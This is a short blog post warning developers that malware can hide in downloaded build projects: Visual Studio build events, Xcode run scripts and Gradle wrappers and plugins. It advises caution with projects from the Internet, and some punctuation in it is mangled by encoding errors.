A bit less than two months ago, I wrote ���Checking for Poisoned Projects���.This outlined how malware embedded in a Visual Studio project ��� not inthe app the project would build, but in the project itself. Designed to infectsecurity researchers, this malware was distributed as a Windows DLL that wouldbe executed through ���build events��� on the researchers��� machines.

Today, we find out that iOS developers were attacked in a similar fashion.Apparently, Xcode offers ���run scripts��� that run as part of the build process.In this case, the run script downloaded spyware and installed it on the developers���machines.

It is merely a matter of time before we find out that Android developers are beingsimilarly attacked.

Please be very very careful when working with projects that you get from theInternet, including from popular sources like GitHub. In���Checking for Poisoned Projects���,I point out some of the standard developer security advice regarding usingsomebody else���s project that I have been giving for years. Basically, be verycareful about the Gradle wrapper, as that is an easy way for an attackerto get malware onto your development machine. There are other attack avenues as well,such as Gradle plugins, compiler plugins, and annotation processors, that we needto worry about.

It would be lovely if somehow Android app development was immune to this sort ofproblem. That is very unrealistic. Someday, I fear that we will get a better pictureof exactly how unrealistic it is.